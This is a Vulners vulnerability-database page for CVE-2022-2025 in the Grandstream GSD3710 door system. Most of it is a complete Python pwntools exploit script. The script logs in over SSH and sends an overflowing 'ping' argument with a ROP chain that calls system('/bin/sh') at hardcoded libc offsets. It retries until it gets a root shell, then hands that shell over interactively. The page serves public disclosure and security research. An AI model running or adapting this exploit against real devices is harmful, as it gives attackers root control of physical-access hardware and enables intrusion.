Vulners
Lucene search
Grandstream GSD3710 1.0.11.13 - Stack Overflow
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | CVE-2022-2025 | 23 Sep 202220:43 | – | circl |
 | Grandstream GSD3710 缓冲区错误漏洞 | 23 Sep 202200:00 | – | cnnvd |
 | CVE-2022-2025 | 23 Sep 202215:06 | – | cve |
 | CVE-2022-2025 Grandstream GSD3710 Stack-based Buffer Overflow | 23 Sep 202215:06 | – | cvelist |
 | EUVD-2022-34329 | 23 Sep 202215:06 | – | euvd |
 | CVE-2022-2025 | 23 Sep 202216:15 | – | nvd |
 | CVE-2022-2025 | 23 Sep 202216:15 | – | osv |
 | Design/Logic Flaw | 23 Sep 202216:15 | – | prion |
 | PT-2022-14472 · Grandstream · Grandstream Gsd3710 | 23 Sep 202200:00 | – | ptsecurity |
#!/usr/bin/env python3
# Exploit Title: Grandstream GSD3710 1.0.11.13 - Stack Overflow
# Date: 2025-05-29
# Exploit Author: Pepelux
# Vendor Homepage: https://www.grandstream.com/
# Version: Grandstream GSD3710 - firmware:1.0.11.13 and lower
# Tested on: Linux and MacOS
# CVE: CVE-2022-2025
"""
Author: Jose Luis Verdeguer (@pepeluxx)
Required: Pwntools
Example:
$ python 3 CVE-2022-2025.py -i DEVICE_IP -u USER -p PASSWORD
"""
from struct import pack
import sys
from time import sleep
import argparse
from pwn import *
def get_args():
parser = argparse.ArgumentParser(
formatter_class=lambda prog: argparse.RawDescriptionHelpFormatter(
prog, max_help_position=50))
# Add arguments
parser.add_argument('-i', '--ip', type=str, required=True,
help='device IP address', dest="ip")
parser.add_argument('-u', '--user', type=str, required=True,
help='username', dest="user")
parser.add_argument('-p', '--pass', type=str, required=True,
help='password', dest="pwd")
# Array for all arguments passed to script
args = parser.parse_args()
try:
ip = args.ip
user = args.user
pwd = args.pwd
return ip, user, pwd
except ValueError:
exit()
def check_badchars(payload):
for i in range(5, len(payload)):
if payload[i] in [0xd, 0xa, 0x3b, 0x7c, 0x20]:
log.warn("Badchar %s detected at %#x" % (hex(payload[i]), i))
return True
return False
def main():
ip, user, pwd = get_args()
libc_base = 0x76bb8000
gadget = libc_base + 0x5952C # 0x0005952c: pop {r0, r4, pc};
bin_sh = libc_base + 0xCEA9C # /bin/sh
system = libc_base + 0x2C7FD # 0x0002c7fd # system@libc
exit = libc_base + 0x2660C
print("[*] Libc base: %#x" % libc_base)
print("[*] ROP gadget: %#x" % gadget)
print("[*] /bin/sh: %#x" % bin_sh)
print("[*] system: %#x" % system)
print("[*] exit: %#x\n" % exit)
padding = b"A" * 320
payload = b'ping '
payload += padding
payload += p32(gadget)
payload += p32(bin_sh)
payload += b"AAAA"
payload += p32(system)
payload += p32(exit)
if check_badchars(payload):
sys.exit(0)
count = 1
while True:
print('Try: %d' % count)
s = ssh(user, ip, 22, pwd)
p = s.shell(tty=False)
print(p.readuntil(b"GDS3710> "))
p.sendline(payload)
p.sendline(b"id")
sleep(1)
data = p.read()
if str(data).find('root') > -1:
print('PWNED!')
p.interactive()
s.close()
sys.exit()
s.close()
count += 1
if __name__ == '__main__':
main()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Jun 2025 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.19.8
EPSS0.11321